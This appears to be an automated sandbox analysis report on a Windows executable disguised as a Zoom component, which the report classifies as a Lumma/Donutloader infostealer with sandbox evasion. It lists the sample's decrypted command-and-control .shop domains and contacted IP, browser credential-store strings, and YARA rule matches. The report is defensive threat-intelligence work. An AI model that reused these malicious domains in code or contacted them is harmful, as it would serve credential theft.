            Source: rwsNDpQSKZ.exe, 00000000.00000003.1742950186.0000000003078000.00000004.00000020.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000003.1789398984.0000000003062000.00000004.00000020.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000003.1789467851.0000000003078000.00000004.00000020.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000003.1789281360.0000000003060000.00000004.00000020.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000003.1742844809.000000000306A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://outpointsozp.shop/P_;
            Source: rwsNDpQSKZ.exe, 00000000.00000003.1742844809.000000000306A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://outpointsozp.shop/api
            Source: rwsNDpQSKZ.exe, 00000000.00000003.1836784813.00000000030B9000.00000004.00000020.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000002.1838350467.00000000030B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://outpointsozp.shop/api)
            Source: rwsNDpQSKZ.exe, 00000000.00000003.1786885826.0000000005AEC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://outpointsozp.shop/apib
            Source: rwsNDpQSKZ.exe, 00000000.00000003.1836784813.0000000003034000.00000004.00000020.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000002.1838245473.0000000003034000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://outpointsozp.shop/j
            Source: rwsNDpQSKZ.exe, 00000000.00000003.1742903740.000000000304C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://outpointsozp.shop/m
            Source: rwsNDpQSKZ.exe, 00000000.00000003.1833124427.0000000005AEC000.00000004.00000800.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000002.1839559893.0000000005AEE000.00000004.00000800.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000003.1809836144.0000000005AEC000.00000004.00000800.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000003.1836680498.0000000005AEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://outpointsozp.shop:443/api
            Source: rwsNDpQSKZ.exe, 00000000.00000002.1839559893.0000000005AEE000.00000004.00000800.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000003.1836680498.0000000005AEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://outpointsozp.shop:443/apij
            Source: rwsNDpQSKZ.exe, 00000000.00000003.1743157934.0000000005B43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
            Source: rwsNDpQSKZ.exe, 00000000.00000003.1776069335.0000000005C0E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
            Source: rwsNDpQSKZ.exe, 00000000.00000003.1776069335.0000000005C0E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
            Source: rwsNDpQSKZ.exe, 00000000.00000003.1743157934.0000000005B41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
            Source: rwsNDpQSKZ.exe, 00000000.00000003.1743157934.0000000005B41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
            Source: rwsNDpQSKZ.exe, 00000000.00000003.1776396380.0000000005AEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
            Source: rwsNDpQSKZ.exe, 00000000.00000003.1743747307.0000000005B2C000.00000004.00000800.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000003.1743634641.0000000005B2C000.00000004.00000800.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000003.1743543414.0000000005B2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: rwsNDpQSKZ.exe, 00000000.00000003.1776396380.0000000005AEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
            Source: rwsNDpQSKZ.exe, 00000000.00000003.1743747307.0000000005B2C000.00000004.00000800.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000003.1743634641.0000000005B2C000.00000004.00000800.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000003.1743543414.0000000005B2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: rwsNDpQSKZ.exe, 00000000.00000003.1776069335.0000000005C0E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
            Source: rwsNDpQSKZ.exe, 00000000.00000003.1776069335.0000000005C0E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
            Source: rwsNDpQSKZ.exe, 00000000.00000003.1776069335.0000000005C0E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
            Source: rwsNDpQSKZ.exe, 00000000.00000003.1776069335.0000000005C0E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
            Source: rwsNDpQSKZ.exe, 00000000.00000003.1776069335.0000000005C0E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
            Source: rwsNDpQSKZ.exeString found in binary or memory: https://zoom.us/privacy/support
            Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
            Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
            Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
            Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
            Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
            Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
            Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49731 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49732 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49733 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49734 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49735 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49736 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49737 version: TLS 1.2

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 00000000.00000002.1838828037.0000000004B20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: 0_2_00C9BA600_2_00C9BA60
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: 0_2_00CEC0C30_2_00CEC0C3
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: 0_2_00D0C0640_2_00D0C064
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: 0_2_00D0C1840_2_00D0C184
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: 0_2_00D0A5D60_2_00D0A5D6
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: 0_2_00CD85C00_2_00CD85C0
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: 0_2_00C647F00_2_00C647F0
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: 0_2_00CCE8D00_2_00CCE8D0
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: 0_2_00C648000_2_00C64800
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: 0_2_00D009670_2_00D00967
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: 0_2_00CF4AA80_2_00CF4AA8
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: 0_2_00CF6A700_2_00CF6A70
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: 0_2_00CC6EC00_2_00CC6EC0
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: 0_2_00CCCFC00_2_00CCCFC0
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: 0_2_00CD6F200_2_00CD6F20
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: 0_2_00CC91500_2_00CC9150
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: 0_2_00D052590_2_00D05259
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: 0_2_00CE73300_2_00CE7330
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: 0_2_00D0F6C00_2_00D0F6C0
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: 0_2_00C9B9C00_2_00C9B9C0
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: String function: 00CE5398 appears 230 times
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: String function: 00C5D3E7 appears 75 times
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: String function: 00CE5960 appears 54 times
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: String function: 00C56FFA appears 201 times
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: String function: 00C9B84F appears 93 times
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: String function: 00CE5365 appears 679 times
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: String function: 00C5DC01 appears 148 times
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: String function: 00C5DE1B appears 185 times
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: String function: 00C5DEC4 appears 58 times
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: String function: 00C5D860 appears 39 times
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: String function: 00CE5333 appears 239 times
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: String function: 00C5D270 appears 36 times
            Source: rwsNDpQSKZ.exeStatic PE information: invalid certificate
            Source: rwsNDpQSKZ.exe, 00000000.00000003.1715639612.0000000005240000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameZoom* vs rwsNDpQSKZ.exe
            Source: rwsNDpQSKZ.exe, 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameZoom* vs rwsNDpQSKZ.exe
            Source: rwsNDpQSKZ.exeBinary or memory string: OriginalFilenameZoom* vs rwsNDpQSKZ.exe
            Source: rwsNDpQSKZ.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 00000000.00000002.1838828037.0000000004B20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@1/1
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: 0_2_00CD35F0 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,Concurrency::cancel_current_task,0_2_00CD35F0
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: 0_2_00CDC74F __EH_prolog3_GS,GetCommandLineW,LoadLibraryW,CoInitializeEx,CoCreateInstance,?Unlock@CState@Cmm@@QAEXXZ,0_2_00CDC74F
            Source: rwsNDpQSKZ.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: rwsNDpQSKZ.exe, 00000000.00000003.1743634641.0000000005AFD000.00000004.00000800.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000003.1743279105.0000000005B19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: rwsNDpQSKZ.exeReversingLabs: Detection: 39%
            Source: rwsNDpQSKZ.exeVirustotal: Detection: 45%
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile read: C:\Users\user\Desktop\rwsNDpQSKZ.exeJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeSection loaded: mapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeSection loaded: webio.dllJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: rwsNDpQSKZ.exeStatic PE information: More than 7058 > 100 exports found
            Source: rwsNDpQSKZ.exeStatic file information: File size 2362184 > 1048576
            Source: rwsNDpQSKZ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: rwsNDpQSKZ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: rwsNDpQSKZ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: rwsNDpQSKZ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: rwsNDpQSKZ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: rwsNDpQSKZ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: rwsNDpQSKZ.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
            Source: rwsNDpQSKZ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: c:\jenkins\workspace\Client\Client\Windows\release\Bin\Release\ZoomOutlookMAPI.pdb source: rwsNDpQSKZ.exe
            Source: rwsNDpQSKZ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: rwsNDpQSKZ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: rwsNDpQSKZ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: rwsNDpQSKZ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: rwsNDpQSKZ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: 0_2_00CDE020 __EH_prolog3,CreateFileW,CloseHandle,LoadLibraryW,LoadLibraryW,FreeLibrary,GetCurrentProcessId,LoadLibraryW,GetProcAddress,GetProcAddress,?Unlock@CState@Cmm@@QAEXXZ,?Unlock@CState@Cmm@@QAEXXZ,FreeLibrary,0_2_00CDE020
            Source: rwsNDpQSKZ.exeStatic PE information: section name: .PROPSEC
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: 0_2_00CE5333 push ecx; ret 0_2_00CE5346
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: 0_2_00CE2106 __EH_prolog3_GS,GetPrivateProfileStringW,0_2_00CE2106
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: 0_2_00CDC84B SHGetFolderPathW,PathAppendW,GetPrivateProfileIntW,CreateThread,CreateEventW,GetCurrentThreadId,ResumeThread,0_2_00CDC84B
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Query firmware table information (likely to detect VMs)
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeSystem information queried: FirmwareTableInformationJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeAPI coverage: 0.0 %
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exe TID: 6152Thread sleep time: -150000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exe TID: 6152Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: 0_2_00CBE0BE FindFirstFileW,FindClose,0_2_00CBE0BE
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: 0_2_00D067D0 FindFirstFileExW,0_2_00D067D0
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: 0_2_00C628A3 SetLastError,FindFirstFileW,RemoveDirectoryW,?Unlock@CState@Cmm@@QAEXXZ,GetProcessHeap,HeapFree,FindNextFileW,GetProcessHeap,HeapFree,FindClose,SetLastError,0_2_00C628A3
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: 0_2_00C63070 cmm_fs_find_first,cmm_wstr_ncpy,FindFirstFileW,0_2_00C63070
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: 0_2_00CDD988 __EH_prolog3,GetSystemInfo,0_2_00CDD988
            Source: rwsNDpQSKZ.exe, 00000000.00000003.1837241948.0000000003063000.00000004.00000020.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000003.1789398984.0000000003062000.00000004.00000020.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000003.1804407153.0000000003063000.00000004.00000020.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000003.1789813074.0000000003063000.00000004.00000020.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000003.1836784813.0000000003060000.00000004.00000020.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000003.1836784813.0000000003034000.00000004.00000020.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000002.1838245473.0000000003034000.00000004.00000020.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000002.1838350467.0000000003064000.00000004.00000020.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000003.1789281360.0000000003060000.00000004.00000020.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000003.1742844809.000000000306A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: 0_2_00CE466A IsDebuggerPresent,OutputDebugStringW,0_2_00CE466A
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: 0_2_00CDE020 __EH_prolog3,CreateFileW,CloseHandle,LoadLibraryW,LoadLibraryW,FreeLibrary,GetCurrentProcessId,LoadLibraryW,GetProcAddress,GetProcAddress,?Unlock@CState@Cmm@@QAEXXZ,?Unlock@CState@Cmm@@QAEXXZ,FreeLibrary,0_2_00CDE020
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: 0_2_00D0E5D7 mov esi, dword ptr fs:[00000030h]0_2_00D0E5D7
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: 0_2_00D00FF1 mov eax, dword ptr fs:[00000030h]0_2_00D00FF1
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: 0_2_00D00FAD mov eax, dword ptr fs:[00000030h]0_2_00D00FAD
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: 0_2_00CFB48C mov eax, dword ptr fs:[00000030h]0_2_00CFB48C
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: 0_2_00CDC00B GetProcessHeap,0_2_00CDC00B
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: 0_2_00CDEBBC CloseHandle,CloseHandle,CloseHandle,SetUnhandledExceptionFilter,EnterCriticalSection,LeaveCriticalSection,CloseHandle,0_2_00CDEBBC
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: 0_2_00CDEC9F SetUnhandledExceptionFilter,0_2_00CDEC9F
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: 0_2_00CE4FE5 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00CE4FE5
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: 0_2_00CE5791 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00CE5791

            HIPS / PFW / Operating System Protection Evasion

            barindex
            LummaC encrypted strings found
            Source: rwsNDpQSKZ.exeString found in binary or memory: outpointsozp.shop
            Source: rwsNDpQSKZ.exeString found in binary or memory: unseaffarignsk.shop
            Source: rwsNDpQSKZ.exeString found in binary or memory: indexterityszcoxp.shop
            Source: rwsNDpQSKZ.exeString found in binary or memory: callosallsaospz.shop
            Source: rwsNDpQSKZ.exeString found in binary or memory: lariatedzugspd.shop
            Source: rwsNDpQSKZ.exeString found in binary or memory: liernessfornicsa.shop
            Source: rwsNDpQSKZ.exeString found in binary or memory: shepherdlyopzc.shop
            Source: rwsNDpQSKZ.exeString found in binary or memory: upknittsoappz.shop
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: 0_2_00CBE114 OpenProcessToken,GetLastError,CloseHandle,CloseHandle,FreeSid,GetProcessHeap,HeapFree,FreeSid,CloseHandle,DuplicateTokenEx,GetLastError,AllocateAndInitializeSid,CreateWellKnownSid,GetLastError,GetProcessHeap,HeapAlloc,CreateWellKnownSid,CreateRestrictedToken,AllocateAndInitializeSid,SetTokenInformation,0_2_00CBE114
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: 0_2_00CAF2D0 cpuid 0_2_00CAF2D0
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: ?Unlock@CState@Cmm@@QAEXXZ,GetLocaleInfoW,0_2_00D00116
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_00D0922F
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: EnumSystemLocalesW,0_2_00D094D7
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: GetLocaleInfoW,0_2_00D09430
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: EnumSystemLocalesW,0_2_00D095BD
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: EnumSystemLocalesW,0_2_00D09522
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_00D09650
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: GetLocaleInfoW,0_2_00D098B0
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00D099D6
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeQueries volume information: C:\ VolumeInformationJump to behavior
